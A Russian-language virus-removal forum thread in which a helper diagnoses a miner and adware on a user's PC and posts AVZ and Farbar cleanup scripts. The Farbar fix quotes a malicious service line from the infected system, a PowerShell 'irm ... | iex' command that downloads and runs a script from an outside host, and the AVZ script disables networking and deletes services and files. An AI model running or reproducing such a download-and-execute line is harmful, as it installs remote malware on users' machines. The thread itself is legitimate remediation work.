Подозрение на вирус

**Kustik1626** · 03.06.2025, 20:07

У девушки комп стал медленно работать и ОП загружена на 70% при одном браузере

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 03.06.2025, 20:10

Уважаемый(ая) Kustik1626, спасибо за обращение на наш форум!

Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

**Vvvyg** · 03.06.2025, 20:56

Майнер и кучка adware, известных даже штатному Защитнику от Microsoft, но его же выключили наверняка.

Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:

Код:

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 TerminateProcessByName('c:\programdata\fontdrvhost.exe');
 TerminateProcessByName('c:\programdata\mistaken-strain\bin.exe');
 DeleteFile('c:\programdata\fontdrvhost.exe', '');
 DeleteFile('c:\programdata\fontdrvhost.exe', '64');
 DeleteFile('c:\programdata\mistaken-strain\bin.exe', '');
 DeleteFile('C:\ProgramData\mistaken-strain\bin.exe', '64');
 DeleteFile('C:\ProgramData\september-ministry\bin.exe', '64');
 DeleteFile('C:\ProgramData\type-polish\bin.exe', '64');
 DeleteFile('C:\Users\Каринка\AppData\Local\Programs\912da9e1\b0ab56c4ad.msi', '64');
 DeleteService('GoogleChromeElevationService');
 DeleteService('GoogleUpdaterInternalService138.0.7156.0');
 DeleteService('GoogleUpdaterService138.0.7156.0');
 DeleteService('MozillaMaintenance');
 DeleteFileMask('c:\programdata\mistaken-strain', '*', true);
 DeleteFileMask('c:\programdata\september-ministry', '*', true);
 DeleteFileMask('c:\programdata\type-polish', '*', true);
 DeleteFileMask('c:\users\каринка\appdata\local\programs\912da9e1', '*', true);
 DeleteDirectory('"c:\windows\system32\msiexec.exe" /i "c:\users\каринка\appdata\local\programs\912da9e1');
 DeleteDirectory('c:\programdata\mistaken-strain');
 DeleteDirectory('c:\programdata\september-ministry');
 DeleteDirectory('c:\programdata\type-polish');
 DeleteDirectory('c:\users\каринка\appdata\local\programs\912da9e1');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'Каринка', '32');
 RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'Каринка', '64');
 DeleteSchedulerTask('Driver Booster Scheduler');
 DeleteSchedulerTask('Driver Booster SkipUAC (Каринка)');
 DeleteSchedulerTask('Driver Booster Update');
 DeleteSchedulerTask('EdgeUpdate');
 DeleteSchedulerTask('IObit B5Sale (One-time)');
 DeleteSchedulerTask('IObit DB2024B5 (One-Time)');
 DeleteSchedulerTask('MicrosoftConsole');
 DeleteSchedulerTask('Mozilla\Firefox Background Update S-1-5-21-2005959300-1548360215-2041322106-1001 308046B0AF4A39CB');
 DeleteSchedulerTask('Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB');
 DeleteSchedulerTask('Opera scheduled assistant Autoupdate 1742304863');
 DeleteSchedulerTask('Opera scheduled Autoupdate 1742304858');
 DeleteSchedulerTask('quick-vat-S-1-5-21-2005959300-1548360215-2041322106-1001');
 DeleteSchedulerTask('relate-thoughtful');
 DeleteSchedulerTask('remote-plane');
 DeleteSchedulerTask('Telamon Cleaner');
 DeleteSchedulerTask('unlike-poison');
 DeleteSchedulerTask('Каринка');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".

Код:

>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk"          -> ["C:\Program Files\Mozilla Firefox\firefox.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Приватный просмотр Firefox.lnk"           -> ["C:\Program Files\Mozilla Firefox\private_browsing.exe"]
>>>  "C:\Users\Public\Desktop\Firefox.lnk"         -> ["C:\Program Files\Mozilla Firefox\firefox.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by.xatab\Запустить The Elder Scrolls V Skyrim - Special Edition.lnk"    -> ["D:\The Elder Scrolls V Skyrim - Special Edition\SkyrimSE.exe"]
>>>  "C:\Users\Каринка\Desktop\The Elder Scrolls V Skyrim - Special Edition.lnk"           -> ["D:\The Elder Scrolls V Skyrim - Special Edition\SkyrimSE.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by.xatab\Удалить The Elder Scrolls V Skyrim - Special Edition.lnk"      -> ["D:\The Elder Scrolls V Skyrim - Special Edition\unins000.exe"]
>>>  "C:\Users\Каринка\Desktop\Garrys Mod.lnk"     -> ["D:\Garrys Mod\gmod.exe"]
>>>  "C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk"       -> ["C:\Windows\system32\narrator.exe"]
>>>  "C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk"       -> ["C:\Windows\system32\osk.exe"]
>>>  "C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk"         -> ["C:\Windows\system32\WFS.exe"  =>> /SendTo]
>>>  "C:\Users\Каринка\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk"         -> ["C:\Windows\system32\mblctr.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlanetVPN\PlanetVPN.lnk"        -> ["C:\Program Files (x86)\PlanetVPN\PlanetVPN.exe"]
>>>  "C:\Users\Public\Desktop\PlanetVPN.lnk"       -> ["C:\Program Files (x86)\PlanetVPN\PlanetVPN.exe"]
>>>  "C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\Start Menu\Archivator RAR.lnk"    -> ["D:\Archivator RAR\ArchRar.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garrys Mod\Garrys Mod.lnk"      -> ["D:\Garrys Mod\gmod.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garrys Mod\Uninstall.lnk"       -> ["D:\Garrys Mod\Uninstall\unins000.exe"]
>>>  "C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameInstallerPro\GameInstallerPro.lnk"      -> ["C:\Program Files\GameInstallerPro\GameInstallerPro.exe"]
>>>  "C:\Users\Каринка\Desktop\Stardew Valley.lnk"           -> ["D:\Stardew Valley\Stardew Valley.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RimWorld [GOG.com]\Удалить RimWorld.lnk"  -> ["D:\RimWorld\unins000.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RimWorld [GOG.com]\RimWorld.lnk"          -> ["D:\RimWorld\RimWorldWin64.exe"]
>>>  "C:\Users\Public\Desktop\Baldur's Gate 3.lnk"           -> ["D:\Games\Baldur's Gate 3\Launcher.exe"]
>>>  "C:\Users\Каринка\Desktop\Telamon Cleaner.lnk"          -> ["C:\Program Files (x86)\Telamon Cleaner\TelamonCleaner.exe"]
>>>  "C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telamon Cleaner\Telamon Cleaner.lnk"        -> ["C:\Program Files (x86)\Telamon Cleaner\TelamonCleaner.exe"]
>>>  "C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telamon Cleaner\Telamon Cleaner Uninstall.lnk"        -> ["C:\Program Files (x86)\Telamon Cleaner\TelamonCleaner.exe"  =>> --uninstall]
>>>  "C:\Users\Каринка\Desktop\Portal Dungeon.lnk"           -> ["C:\Portal Dungeon\Portal Dungeon.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spells & Secrets [GOG.com]\Удалить Spells & Secrets.lnk"      -> ["D:\Spells & Secrets\unins000.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spells & Secrets [GOG.com]\Spells & Secrets.lnk"    -> ["D:\Spells & Secrets\Spells & Secrets.exe"]
>>>  "C:\Users\Public\Desktop\Spells & Secrets.lnk"          -> ["D:\Spells & Secrets\Spells & Secrets.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\violent-thief\remote-plane.lnk"           -> ["C:\ProgramData\mistaken-strain\remote-plane"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Banners of Ruin [GOG.com]\Удалить Banners of Ruin.lnk"        -> ["D:\Banners of Ruin\unins000.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Banners of Ruin [GOG.com]\Banners of Ruin.lnk"      -> ["D:\Banners of Ruin\BannersOfRuin.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stardew Valley [GOG.com]\Удалить Stardew Valley.lnk"          -> ["C:\GOG Games\Stardew Valley\unins000.exe"]
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stardew Valley [GOG.com]\Stardew Valley.lnk"        -> ["C:\GOG Games\Stardew Valley\Stardew Valley.exe"]
>>>  "C:\Users\Public\Desktop\Торрент  Игруха.lnk"           -> ["C:\Users\Public\Documents\TI\Torrent-Igruha.Org.URL"]

Отчёт о работе прикрепите.

Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать.

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**Kustik1626** · 04.06.2025, 18:45

Вот

**Vvvyg** · 04.06.2025, 21:44

Программу Download Studio сами устанавливали? Если нет - удалите.

Выполните следующее исправление в безопасном режиме загрузки системы.

Выделите и скопируйте в буфер обмена следующий код:

Код:

Start::
CreateRestorePoint:
CloseProcesses:
(Microsoft Corporation) [Файл не подписан] C:\ProgramData\fontdrvhost.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-2005959300-1548360215-2041322106-1001\...\Run: [YandexBrowserAutoLaunch_F55C2B99E2C131ADF5EAE98A13D2BEDD] => "C:\Users\Каринка\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --shutdown-if-not-closed-by-system-restart (Нет файла)
HKU\S-1-5-21-2005959300-1548360215-2041322106-1001\...\Run: [PlanetVPN] => C:\Program Files (x86)\PlanetVPN\PlanetVPN.exe (Нет файла)
HKU\S-1-5-21-2005959300-1548360215-2041322106-1001\...\Run: [GameInstallerPro] => "C:\Program Files\GameInstallerPro\GameInstallerPro.exe" /autostart (Нет файла)
GroupPolicy: Ограничение - Edge <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Edge: Ограничение <==== ВНИМАНИЕ
Task: {A07A9BF7-41BF-4FDF-9A31-095D004E0723} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem138.0.7156.0{34F8507D-FBE8-4802-A34B-8670A1EA6157} => "C:\Program Files (x86)\Google\GoogleUpdater\138.0.7156.0\updater.exe"  --wake --system (Нет файла)
Task: {A8414472-D8AA-494C-8368-95B1FC6787CC} - System32\Tasks\prevent-stern => C:\ProgramData\prayer-southern\bin.exe  /H (Нет файла)
Edge HomePage: Default -> hxxps://find-it.pro/?utm_source=distr_m
Edge StartupUrls: Default -> "hxxp://go.microsoft.com/fwlink/?LinkId=2134209&0x419"
Edge DefaultSearchURL: Default -> hxxps://xfinder.pro/q?q={searchTerms}
Edge DefaultSearchKeyword: Default -> xfinder.pro
Edge DefaultSuggestURL: Default -> hxxps://xfinder.pro/q/suggest.php?q={searchTerms}
C:\Users\Каринка\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem
Edge Extension: (Torrent Scanner) - C:\Users\Каринка\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\phbiednkooflapfcohpnpfdfdncbbmdn [2025-03-18] [UpdateUrl:0] <==== ВНИМАНИЕ
C:\Users\Каринка\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\phbiednkooflapfcohpnpfdfdncbbmdn
CHR HKU\S-1-5-21-2005959300-1548360215-2041322106-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ibknafobnmndicojahlppolcaaibngjf]
YAN DefaultSearchURL: Default -> hxxps://find-it.pro/search?utm_source=extension&q={searchTerms}
YAN DefaultSearchKeyword: Default -> find-it.pro
YAN DefaultSuggestURL: Default -> hxxps://find-it.pro/search/suggest.php?q={searchTerms}
C:\Users\Каринка\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions\npiclhkkbgabhapklngkpahnaafkgpne
S2 MicrosoftConsole; cmd.exe /c powershell.exe irm hxxps://gocrazy.gg/script?id=oRoWIOAtAl`^&tag=createservice5 ^| iex [X] <==== ВНИМАНИЕ
2025-06-04 19:37 - 2025-03-18 18:28 - 000000000 ____D C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telamon Cleaner
2025-06-04 19:37 - 2024-11-12 20:33 - 000000000 ____D C:\Users\Каринка\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameInstallerPro
2025-06-04 19:37 - 2024-11-12 18:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PlanetVPN
2025-06-04 19:34 - 2025-06-04 19:34 - 005265920 __RSH (Microsoft Corporation) C:\ProgramData\fontdrvhost.exe
2025-05-17 22:15 - 2025-05-17 22:15 - 004516352 __RSH (Microsoft Corporation) C:\ProgramData\RuntimeBroker.exe
2025-04-08 19:45 C:\Program Files\RDP Wrapper
2025-04-08 19:45 C:\Program Files (x86)\360
2025-04-08 19:45 C:\ProgramData\RDP Wrapper
2025-04-08 19:45 C:\ProgramData\ReaItekHD
2025-04-08 19:45 C:\ProgramData\Setup
2025-04-08 19:45 C:\ProgramData\Windows Tasks Service
2025-04-08 19:45 C:\ProgramData\WindowsTask
CustomCLSID: HKU\S-1-5-21-2005959300-1548360215-2041322106-1001_Classes\CLSID\{3BEAC860-888B-4CDF-9FD5-900D13FC4748}\InprocServer32 -> C:\Program Files\Mozilla Firefox\notificationserver.dll => Нет файла
HKU\S-1-5-21-2005959300-1548360215-2041322106-1001\...\Run: [flukeproxy] => C:\Users\Каринка\AppData\Local\flukeproxy\flukeproxy.exe [582096 2025-02-25] (Agora International Agency Bilisim Hizmetleri Limited Sirketi -> flukeproxy)
C:\Users\Каринка\AppData\Local\flukeproxy
FirewallRules: [{8ABC54B1-8C25-4978-94CD-66CB0367D18B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe => Нет файла
FirewallRules: [{E5248A6F-649F-4C3E-8D85-10B5B9746924}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe => Нет файла
FirewallRules: [TCP Query User{0F3DF3FA-8AE5-43DF-B464-2CDBF29947E8}C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.10-windows-x64\bin\java.exe] => (Allow) C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.10-windows-x64\bin\java.exe => Нет файла
FirewallRules: [UDP Query User{5431F044-0B93-4E90-842B-2B7720598589}C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.10-windows-x64\bin\java.exe] => (Allow) C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.10-windows-x64\bin\java.exe => Нет файла
FirewallRules: [{A1F23FB2-4043-44F5-B445-A7E1C74F9BB3}] => (Block) C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.10-windows-x64\bin\java.exe => Нет файла
FirewallRules: [{447444BA-5F88-49A5-A53F-A5DE5BBBC841}] => (Block) C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.10-windows-x64\bin\java.exe => Нет файла
FirewallRules: [TCP Query User{22099C3E-72F2-4D79-960B-C761AE515A51}C:\users\каринка\appdata\local\discord\app-1.0.9169\discord.exe] => (Block) C:\users\каринка\appdata\local\discord\app-1.0.9169\discord.exe => Нет файла
FirewallRules: [UDP Query User{4D75F7D3-214C-4588-9E68-E5E4A988E7CB}C:\users\каринка\appdata\local\discord\app-1.0.9169\discord.exe] => (Block) C:\users\каринка\appdata\local\discord\app-1.0.9169\discord.exe => Нет файла
FirewallRules: [TCP Query User{0AE0A96B-3BDC-49BB-A787-FA09079E67D5}C:\program files\gameinstallerpro\gameinstallerpro.exe] => (Block) C:\program files\gameinstallerpro\gameinstallerpro.exe => Нет файла
FirewallRules: [UDP Query User{F95A2785-0838-4630-87DD-2D8DDBB81DAA}C:\program files\gameinstallerpro\gameinstallerpro.exe] => (Block) C:\program files\gameinstallerpro\gameinstallerpro.exe => Нет файла
FirewallRules: [TCP Query User{14BFEBAC-2936-487E-8542-8CF9E82A51B0}D:\garrys mod\gmod.exe] => (Allow) D:\garrys mod\gmod.exe => Нет файла
FirewallRules: [UDP Query User{22A817AD-60EA-402F-A8DF-D3C16D50C2E9}D:\garrys mod\gmod.exe] => (Allow) D:\garrys mod\gmod.exe => Нет файла
FirewallRules: [TCP Query User{1DA1E23B-B774-499F-A4A6-F62E13139AB5}C:\program files (x86)\planetvpn\bin\xray\xray.exe] => (Block) C:\program files (x86)\planetvpn\bin\xray\xray.exe => Нет файла
FirewallRules: [UDP Query User{1650D9F0-9168-46DC-ADAF-38916F8E6B9A}C:\program files (x86)\planetvpn\bin\xray\xray.exe] => (Block) C:\program files (x86)\planetvpn\bin\xray\xray.exe => Нет файла
FirewallRules: [TCP Query User{9192F46C-F753-4D27-8E8E-F1F183B15F36}D:\ranch simulator\ranch_simulator\binaries\win64\ranch_simulator-win64-shipping.exe] => (Block) D:\ranch simulator\ranch_simulator\binaries\win64\ranch_simulator-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{C0A2388C-791C-41A4-817F-B1BCB780F066}D:\ranch simulator\ranch_simulator\binaries\win64\ranch_simulator-win64-shipping.exe] => (Block) D:\ranch simulator\ranch_simulator\binaries\win64\ranch_simulator-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{0AC7821D-8A83-4AF3-87A4-A746588809CF}C:\gog games\stardew valley\stardew valley.exe] => (Block) C:\gog games\stardew valley\stardew valley.exe => Нет файла
FirewallRules: [UDP Query User{D5A9E7F2-6B67-45B7-8A7A-C7416E8E6DD6}C:\gog games\stardew valley\stardew valley.exe] => (Block) C:\gog games\stardew valley\stardew valley.exe => Нет файла
FirewallRules: [TCP Query User{ABA48A01-0496-422B-B0A6-1A1EF2B96DE9}D:\stardew valley\stardew valley.exe] => (Block) D:\stardew valley\stardew valley.exe => Нет файла
FirewallRules: [UDP Query User{2586E672-0F7D-4BDC-B414-F9E82DC9CAD0}D:\stardew valley\stardew valley.exe] => (Block) D:\stardew valley\stardew valley.exe => Нет файла
FirewallRules: [TCP Query User{5B8BEA8A-5908-45DE-A306-4769EACDA386}C:\users\каринка\esprit games - installed\foxlegends\foxlegends.exe] => (Block) C:\users\каринка\esprit games - installed\foxlegends\foxlegends.exe => Нет файла
FirewallRules: [UDP Query User{8D58F736-D301-4D6B-AD77-42F4C32EDE1A}C:\users\каринка\esprit games - installed\foxlegends\foxlegends.exe] => (Block) C:\users\каринка\esprit games - installed\foxlegends\foxlegends.exe => Нет файла
FirewallRules: [TCP Query User{A7594DC4-F95A-40CE-AF52-24B1937FB9A2}C:\users\каринка\appdata\local\temp\rar$exb11584.31006.rartemp\wild woods\wild woods.exe] => (Block) C:\users\каринка\appdata\local\temp\rar$exb11584.31006.rartemp\wild woods\wild woods.exe => Нет файла
FirewallRules: [UDP Query User{1223FE13-D162-4DE9-B439-5CCB4C5203A8}C:\users\каринка\appdata\local\temp\rar$exb11584.31006.rartemp\wild woods\wild woods.exe] => (Block) C:\users\каринка\appdata\local\temp\rar$exb11584.31006.rartemp\wild woods\wild woods.exe => Нет файла
FirewallRules: [TCP Query User{3F6B7B28-81E0-40A9-ABE2-180E5C14A38D}D:\dont starve together v588693\bin64\dontstarve_steam_x64.exe] => (Block) D:\dont starve together v588693\bin64\dontstarve_steam_x64.exe => Нет файла
FirewallRules: [UDP Query User{8D92AFCE-FC8B-46C1-9BC8-065ADA1C9811}D:\dont starve together v588693\bin64\dontstarve_steam_x64.exe] => (Block) D:\dont starve together v588693\bin64\dontstarve_steam_x64.exe => Нет файла
FirewallRules: [TCP Query User{FCC90C15-8D36-408E-AA67-1282B586F655}C:\users\каринка\appdata\local\temp\rar$exa10080.15327.rartemp\temtem swarm\temtemswarm.exe] => (Block) C:\users\каринка\appdata\local\temp\rar$exa10080.15327.rartemp\temtem swarm\temtemswarm.exe => Нет файла
FirewallRules: [UDP Query User{DB112D46-973F-45C9-9963-77027036BB97}C:\users\каринка\appdata\local\temp\rar$exa10080.15327.rartemp\temtem swarm\temtemswarm.exe] => (Block) C:\users\каринка\appdata\local\temp\rar$exa10080.15327.rartemp\temtem swarm\temtemswarm.exe => Нет файла
FirewallRules: [TCP Query User{83821FC0-1588-448F-88D2-E314EE65C857}C:\users\каринка\desktop\wild woods\wild woods.exe] => (Block) C:\users\каринка\desktop\wild woods\wild woods.exe => Нет файла
FirewallRules: [UDP Query User{22D43602-57F0-4CEE-8741-20642A380D74}C:\users\каринка\desktop\wild woods\wild woods.exe] => (Block) C:\users\каринка\desktop\wild woods\wild woods.exe => Нет файла
FirewallRules: [TCP Query User{DF8A9673-F023-4385-9D07-6C2CD9D6F2E7}C:\users\каринка\appdata\local\temp\rar$exb4104.14434.rartemp\rivals of aether ii\rivals2\binaries\win64\rivals2-win64-shipping.exe] => (Block) C:\users\каринка\appdata\local\temp\rar$exb4104.14434.rartemp\rivals of aether ii\rivals2\binaries\win64\rivals2-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{AA35B9F3-7C50-454D-A5CC-2DD2C8F8BDDB}C:\users\каринка\appdata\local\temp\rar$exb4104.14434.rartemp\rivals of aether ii\rivals2\binaries\win64\rivals2-win64-shipping.exe] => (Block) C:\users\каринка\appdata\local\temp\rar$exb4104.14434.rartemp\rivals of aether ii\rivals2\binaries\win64\rivals2-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{3252B420-C298-4756-BAEE-EC5EF4F87644}C:\users\каринка\appdata\local\temp\rar$exa9280.22029.rartemp\miside.0.91f\misidefull.exe] => (Block) C:\users\каринка\appdata\local\temp\rar$exa9280.22029.rartemp\miside.0.91f\misidefull.exe => Нет файла
FirewallRules: [UDP Query User{F80CA52A-488B-492C-AAB9-C077641E7741}C:\users\каринка\appdata\local\temp\rar$exa9280.22029.rartemp\miside.0.91f\misidefull.exe] => (Block) C:\users\каринка\appdata\local\temp\rar$exa9280.22029.rartemp\miside.0.91f\misidefull.exe => Нет файла
FirewallRules: [TCP Query User{B57BBAEB-B30A-47D8-895E-10576483F205}C:\users\каринка\appdata\roaming\cosmoplex\updates\java11\bin\javaw.exe] => (Block) C:\users\каринка\appdata\roaming\cosmoplex\updates\java11\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{8C52EE5A-8430-4756-9BB9-CDE9BA0DD8E1}C:\users\каринка\appdata\roaming\cosmoplex\updates\java11\bin\javaw.exe] => (Block) C:\users\каринка\appdata\roaming\cosmoplex\updates\java11\bin\javaw.exe => Нет файла
FirewallRules: [TCP Query User{43E6EAD2-ECC7-40D6-8FBC-955A2907B207}C:\users\каринка\desktop\pico park 2\pico_park_2.exe] => (Block) C:\users\каринка\desktop\pico park 2\pico_park_2.exe => Нет файла
FirewallRules: [UDP Query User{E4AD23B2-A154-4122-BEEC-6932F8FDF9C5}C:\users\каринка\desktop\pico park 2\pico_park_2.exe] => (Block) C:\users\каринка\desktop\pico park 2\pico_park_2.exe => Нет файла
FirewallRules: [TCP Query User{DE8A884A-2EAF-449D-AB1B-37C7E31E4BF7}C:\users\каринка\appdata\roaming\cosmoplex\updates\java17x64\bin\javaw.exe] => (Block) C:\users\каринка\appdata\roaming\cosmoplex\updates\java17x64\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{2179F1F8-175B-41C8-87FD-E4B5AF9A9F70}C:\users\каринка\appdata\roaming\cosmoplex\updates\java17x64\bin\javaw.exe] => (Block) C:\users\каринка\appdata\roaming\cosmoplex\updates\java17x64\bin\javaw.exe => Нет файла
FirewallRules: [TCP Query User{22EDBF3F-2D48-496A-9909-2C144F5B2082}C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.11-windows-x64\bin\java.exe] => (Block) C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.11-windows-x64\bin\java.exe => Нет файла
FirewallRules: [UDP Query User{EF356835-D5D6-496A-A56E-D216764068AE}C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.11-windows-x64\bin\java.exe] => (Block) C:\users\каринка\appdata\roaming\.tlauncher\starter\jre_default\jre-17.0.11-windows-x64\bin\java.exe => Нет файла
FirewallRules: [TCP Query User{B1E23745-1F9A-4510-9736-D7ED5A76C106}D:\rimworld\rimworldwin64.exe] => (Block) D:\rimworld\rimworldwin64.exe => Нет файла
FirewallRules: [UDP Query User{A6600E94-DAFE-4B81-BC4D-4E5D03A8788C}D:\rimworld\rimworldwin64.exe] => (Block) D:\rimworld\rimworldwin64.exe => Нет файла
FirewallRules: [{23489458-D5C9-497F-922C-9BF50798801D}] => (Allow) C:\Users\Каринка\AppData\Local\Programs\Opera\opera.exe => Нет файла
FirewallRules: [TCP Query User{9D90038A-D44F-49BC-B47A-383DACB33266}C:\users\каринка\appdata\roaming\.minecraft\runtime\java-runtime-gamma\windows\java-runtime-gamma\bin\javaw.exe] => (Block) C:\users\каринка\appdata\roaming\.minecraft\runtime\java-runtime-gamma\windows\java-runtime-gamma\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{50921978-44BA-43D7-A3F3-2418641010C7}C:\users\каринка\appdata\roaming\.minecraft\runtime\java-runtime-gamma\windows\java-runtime-gamma\bin\javaw.exe] => (Block) C:\users\каринка\appdata\roaming\.minecraft\runtime\java-runtime-gamma\windows\java-runtime-gamma\bin\javaw.exe => Нет файла
FirewallRules: [{F0821728-923E-40F9-B6C0-C485804B64F8}] => (Allow) C:\Users\Каринка\AppData\Local\flukeproxy\flukeproxy.exe (Agora International Agency Bilisim Hizmetleri Limited Sirketi -> flukeproxy)
FirewallRules: [TCP Query User{1C18493A-2B5F-4FE7-832A-1CADEE5D10F8}C:\users\каринка\desktop\balatro\balatro.exe] => (Block) C:\users\каринка\desktop\balatro\balatro.exe => Нет файла
FirewallRules: [UDP Query User{AD5467F3-45D0-4D10-97C2-2FD06B2E6860}C:\users\каринка\desktop\balatro\balatro.exe] => (Block) C:\users\каринка\desktop\balatro\balatro.exe => Нет файла
FirewallRules: [TCP Query User{7899091E-4B28-46EC-886A-698B5AD53B2D}C:\users\каринка\downloads\balatro\balatro.exe] => (Block) C:\users\каринка\downloads\balatro\balatro.exe => Нет файла
FirewallRules: [UDP Query User{5E5D5771-9D5C-49FB-B922-F847AA5B8B8B}C:\users\каринка\downloads\balatro\balatro.exe] => (Block) C:\users\каринка\downloads\balatro\balatro.exe => Нет файла
FirewallRules: [TCP Query User{47B6C12A-018D-419B-BEDF-DC6F48CC7F36}C:\portal dungeon\portal dungeon.exe] => (Block) C:\portal dungeon\portal dungeon.exe => Нет файла
FirewallRules: [UDP Query User{FBE22639-9DED-4C77-B54F-CDBBE9636F42}C:\portal dungeon\portal dungeon.exe] => (Block) C:\portal dungeon\portal dungeon.exe => Нет файла
FirewallRules: [TCP Query User{978667C2-9BF2-4F3C-B4B1-CFBED84BFEE7}D:\palworld\pal\binaries\win64\palworld-win64-shipping.exe] => (Block) D:\palworld\pal\binaries\win64\palworld-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{ADDB194F-F7E1-428D-A719-86967D58EB15}D:\palworld\pal\binaries\win64\palworld-win64-shipping.exe] => (Block) D:\palworld\pal\binaries\win64\palworld-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{CEF4E3C1-3334-4456-A92D-91F7A8DB7113}D:\for the king ii\for the king ii.exe] => (Block) D:\for the king ii\for the king ii.exe => Нет файла
FirewallRules: [UDP Query User{37ED0786-F14E-4644-A4EE-2ADDBAD71F95}D:\for the king ii\for the king ii.exe] => (Block) D:\for the king ii\for the king ii.exe => Нет файла
FirewallRules: [TCP Query User{24175447-A6C5-4891-9EAD-5D58F83BC935}D:\split fiction (2025)\split fiction\split\binaries\win64\splitfiction.exe] => (Block) D:\split fiction (2025)\split fiction\split\binaries\win64\splitfiction.exe => Нет файла
FirewallRules: [UDP Query User{18F53BF9-B094-4DC3-B48E-4AA5920E9265}D:\split fiction (2025)\split fiction\split\binaries\win64\splitfiction.exe] => (Block) D:\split fiction (2025)\split fiction\split\binaries\win64\splitfiction.exe => Нет файла
